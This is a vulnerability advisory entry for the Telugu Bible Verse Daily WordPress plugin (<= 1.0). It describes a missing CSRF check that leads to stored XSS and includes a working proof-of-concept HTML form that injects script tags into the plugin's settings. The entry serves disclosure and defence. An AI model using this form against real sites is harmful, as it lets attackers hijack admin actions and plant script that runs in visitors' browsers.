Lucene search

K
wpexploitAshishWPEX-ID:B47EA36E-F37C-4745-B750-31F5B91F543F
HistoryJul 19, 2021 - 12:00 a.m.

Telugu Bible Verse Daily <= 1.0 - CSRF to Stored XSS

2021-07-1900:00:00
Ashish
414

0.001 Low

EPSS

Percentile

28.1%

The plugin is lacking any CSRF check when saving its settings and verses, and do not sanitise or escape them when outputting them back in the page. This could allow attackers to make a logged in admin change the settings, as well as add malicious verses containing JavaScript code in them, leading to Stored XSS issues

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=telugu-bible-verse-daily%2FTeluguBibleVersedisplay.php" method="POST">
      <input type="hidden" name="tvd_post_type" value="fav" />
      <input type="hidden" name="tvd_connection" value="fopen" />
      <input type="hidden" name="chapter" value="<script>alert(/XSS1/)</script>" />
      <input type="hidden" name="verse" value="<script>alert(/XSS2/)</script>" />
      <input type="hidden" name="verse_add" value="Add Verse ร‚ยป" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

28.1%

Related for WPEX-ID:B47EA36E-F37C-4745-B750-31F5B91F543F